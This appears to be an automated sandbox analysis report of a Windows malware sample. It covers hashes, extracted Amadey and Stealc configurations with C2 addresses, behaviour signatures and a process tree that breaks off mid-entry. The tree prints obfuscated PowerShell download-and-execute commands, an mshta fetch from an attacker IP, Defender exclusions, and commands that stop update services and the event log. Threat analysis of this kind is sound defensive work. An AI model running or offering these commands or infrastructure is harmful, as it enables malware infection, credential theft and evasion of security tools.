Analysis

  • max time kernel
    67s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-11-2024 19:23

General

  • Target

    1NALX_file.exe

  • Size

    1.8MB

  • MD5

    873f4ff6922f79aca237323377183153

  • SHA1

    c0e782ab9058afb71626fae94fdd996cbeda934a

  • SHA256

    bafd70cdb59a7b667840982897d95dcbb9fcf86bde1267aacc5f7b8dcdba0271

  • SHA512

    7fa1c35440711d5f2ac374678ba37b485e73e9e592ea1592268db5420b35c374595b79050ced86cbed22ffe9bfb94a5799527a0e375db37f2a186c911f1c10e8

  • SSDEEP

    49152:Kpe2Nf+D/CmuxmmCTHmn0sPx6rvwEyw1lkpR4Yk4Pbdt50O:R21ya98mYUPoroVslWuLebdb

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/2.png

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/3.png

Extracted

Language
hta
Source
URLs
hta.dropper

http://176.113.115.178/Windows-Update

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/1.png

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

stealc

Botnet

mars

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • UAC bypass 3 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 10 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 16 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 59 IoCs
  • Suspicious use of SendNotifyMessage 31 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:632
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:388
    • C:\Windows\system32\lsass.exe
      C:\Windows\system32\lsass.exe
      1⤵
        PID:688
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:972
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:392
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:888
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1052
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1064
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  1⤵
                    PID:1156
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:2988
                      • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                        C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                        2⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious behavior: EnumeratesProcesses
                        PID:6372
                      • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                        C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                        2⤵
                          PID:1624
                        • C:\Users\Admin\AppData\Local\Temp\service123.exe
                          C:\Users\Admin\AppData\Local\Temp\/service123.exe
                          2⤵
                            PID:2028
                          • C:\Users\Admin\AppData\Local\Temp\service123.exe
                            C:\Users\Admin\AppData\Local\Temp\/service123.exe
                            2⤵
                              PID:3320
                            • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                              C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                              2⤵
                                PID:5884
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                              1⤵
                                PID:1212
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                1⤵
                                  PID:1248
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                  1⤵
                                    PID:1260
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                    1⤵
                                      PID:1360
                                      • C:\Windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                          PID:2652
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                        1⤵
                                          PID:1384
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                          1⤵
                                            PID:1460
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                            1⤵
                                              PID:1480
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                              1⤵
                                                PID:1560
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                1⤵
                                                  PID:1600
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                  1⤵
                                                    PID:1644
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                    1⤵
                                                      PID:1684
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:1764
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                        1⤵
                                                          PID:1788
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                          1⤵
                                                            PID:1940
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                            1⤵
                                                              PID:1948
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                              1⤵
                                                                PID:1988
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                1⤵
                                                                  PID:2032
                                                                • C:\Windows\System32\spoolsv.exe
                                                                  C:\Windows\System32\spoolsv.exe
                                                                  1⤵
                                                                    PID:2080
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                    1⤵
                                                                      PID:2164
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                      1⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2244
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                      1⤵
                                                                        PID:2256
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                        1⤵
                                                                          PID:2412
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                          1⤵
                                                                            PID:2420
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                            1⤵
                                                                              PID:2584
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                              1⤵
                                                                                PID:2644
                                                                              • C:\Windows\sysmon.exe
                                                                                C:\Windows\sysmon.exe
                                                                                1⤵
                                                                                  PID:2676
                                                                                • C:\Windows\System32\svchost.exe
                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                  1⤵
                                                                                    PID:2704
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                    1⤵
                                                                                      PID:2712
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                      1⤵
                                                                                        PID:2836
                                                                                      • C:\Windows\system32\wbem\unsecapp.exe
                                                                                        C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                        1⤵
                                                                                          PID:2996
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                          1⤵
                                                                                            PID:3080
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                            1⤵
                                                                                              PID:3372
                                                                                            • C:\Windows\Explorer.EXE
                                                                                              C:\Windows\Explorer.EXE
                                                                                              1⤵
                                                                                                PID:3380
                                                                                                • C:\Users\Admin\AppData\Local\Temp\1NALX_file.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1NALX_file.exe"
                                                                                                  2⤵
                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Checks computer location settings
                                                                                                  • Identifies Wine through registry keys
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  • Drops file in Windows directory
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:4668
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                    3⤵
                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                    • Checks BIOS information in registry
                                                                                                    • Checks computer location settings
                                                                                                    • Executes dropped EXE
                                                                                                    • Identifies Wine through registry keys
                                                                                                    • Adds Run key to start application
                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:4084
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1007999001\f46c1711ea.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1007999001\f46c1711ea.exe"
                                                                                                      4⤵
                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Executes dropped EXE
                                                                                                      • Identifies Wine through registry keys
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Checks processor information in registry
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      PID:1828
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                                                                                                        5⤵
                                                                                                        • Uses browser remote debugging
                                                                                                        • Enumerates system info in registry
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                        PID:6536
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe5eaecc40,0x7ffe5eaecc4c,0x7ffe5eaecc58
                                                                                                          6⤵
                                                                                                            PID:2440
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2276,i,8702533972307375701,13290253272893086590,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2272 /prefetch:2
                                                                                                            6⤵
                                                                                                              PID:5268
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1732,i,8702533972307375701,13290253272893086590,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2316 /prefetch:3
                                                                                                              6⤵
                                                                                                                PID:6292
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2024,i,8702533972307375701,13290253272893086590,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2488 /prefetch:8
                                                                                                                6⤵
                                                                                                                  PID:6928
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3084,i,8702533972307375701,13290253272893086590,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3136 /prefetch:1
                                                                                                                  6⤵
                                                                                                                  • Uses browser remote debugging
                                                                                                                  PID:4036
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3092,i,8702533972307375701,13290253272893086590,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3176 /prefetch:1
                                                                                                                  6⤵
                                                                                                                  • Uses browser remote debugging
                                                                                                                  PID:6316
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4496,i,8702533972307375701,13290253272893086590,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4524 /prefetch:1
                                                                                                                  6⤵
                                                                                                                  • Uses browser remote debugging
                                                                                                                  PID:2356
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                                                                                                                5⤵
                                                                                                                  PID:4584
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                                                                                                                  5⤵
                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                  PID:5912
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 1284
                                                                                                                  5⤵
                                                                                                                  • Program crash
                                                                                                                  PID:4812
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe"
                                                                                                                4⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:1584
                                                                                                                • C:\Windows\SYSTEM32\wscript.exe
                                                                                                                  "wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js
                                                                                                                  5⤵
                                                                                                                  • Checks computer location settings
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:2608
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                                                                                    6⤵
                                                                                                                    • Blocklisted process makes network request
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • Modifies registry class
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                    PID:2872
                                                                                                                    • C:\Windows\System32\WScript.exe
                                                                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"
                                                                                                                      7⤵
                                                                                                                      • Checks computer location settings
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:3616
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update
                                                                                                                        8⤵
                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                        PID:4536
                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          9⤵
                                                                                                                            PID:4560
                                                                                                                          • C:\Windows\system32\mshta.exe
                                                                                                                            mshta http://176.113.115.178/Windows-Update
                                                                                                                            9⤵
                                                                                                                            • Blocklisted process makes network request
                                                                                                                            • Checks computer location settings
                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                            PID:1228
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                                                                                              10⤵
                                                                                                                              • UAC bypass
                                                                                                                              • Blocklisted process makes network request
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                              PID:5848
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
                                                                                                                                11⤵
                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:5116
                                                                                                                              • C:\Users\Admin\AppData\Roaming\LB31.exe
                                                                                                                                "C:\Users\Admin\AppData\Roaming\LB31.exe"
                                                                                                                                11⤵
                                                                                                                                • Checks BIOS information in registry
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Drops file in System32 directory
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                PID:5568
                                                                                                                                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                  12⤵
                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:6712
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                  12⤵
                                                                                                                                    PID:6312
                                                                                                                                    • C:\Windows\system32\wusa.exe
                                                                                                                                      wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                      13⤵
                                                                                                                                        PID:1256
                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                      C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                      12⤵
                                                                                                                                      • Launches sc.exe
                                                                                                                                      PID:6384
                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                      C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                      12⤵
                                                                                                                                      • Launches sc.exe
                                                                                                                                      PID:2552
                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                      C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                      12⤵
                                                                                                                                      • Launches sc.exe
                                                                                                                                      PID:5432
                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                      C:\Windows\system32\sc.exe stop bits
                                                                                                                                      12⤵
                                                                                                                                      • Launches sc.exe
                                                                                                                                      PID:3044
                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                      C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                      12⤵
                                                                                                                                      • Launches sc.exe
                                                                                                                                      PID:6856
                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                      12⤵
                                                                                                                                      • Power Settings
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:6196
                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                      12⤵
                                                                                                                                      • Power Settings
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:6152
                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                      12⤵
                                                                                                                                      • Power Settings
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:6508
                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                      12⤵
                                                                                                                                      • Power Settings
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:948
                                                                                                                                    • C:\Windows\system32\dialer.exe
                                                                                                                                      C:\Windows\system32\dialer.exe
                                                                                                                                      12⤵
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:5240
                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                      C:\Windows\system32\sc.exe delete "LIB"
                                                                                                                                      12⤵
                                                                                                                                      • Launches sc.exe
                                                                                                                                      PID:1732
                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                      C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"
                                                                                                                                      12⤵
                                                                                                                                      • Launches sc.exe
                                                                                                                                      PID:6108
                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                      C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                      12⤵
                                                                                                                                      • Launches sc.exe
                                                                                                                                      PID:6344
                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                      C:\Windows\system32\sc.exe start "LIB"
                                                                                                                                      12⤵
                                                                                                                                      • Launches sc.exe
                                                                                                                                      PID:6140
                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        13⤵
                                                                                                                                          PID:5616
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                                                                                            6⤵
                                                                                                                            • Blocklisted process makes network request
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                            PID:3912
                                                                                                                            • C:\Windows\system32\ipconfig.exe
